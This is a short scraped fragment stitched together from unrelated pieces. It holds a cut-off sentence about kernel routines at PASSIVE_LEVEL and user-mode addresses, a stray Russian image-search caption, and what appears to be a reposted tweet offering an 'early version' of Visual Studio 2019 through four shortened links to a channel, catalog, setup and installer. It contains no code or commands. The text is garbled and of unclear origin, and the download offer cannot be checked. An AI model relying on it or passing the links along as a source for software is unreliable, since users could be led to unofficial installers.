PASSIVE_LEVEL

. Therefore, user-mode addresses should not be passed in as parameters/arguments.

Visual Studio 2019

alright since its the weekend, hope nobody is watching, you can get an early version of Visual Studio 2019 here https://t.co/aCKX6HhyWP

Картинки по запросу visual studio 2019

channel  — https://t.co/kUX13gca5H

catalog — https://t.co/OG4yKQHy9H

setup — https://t.co/aq0PFucEal

installer — https://t.co/K7IsnKx3jD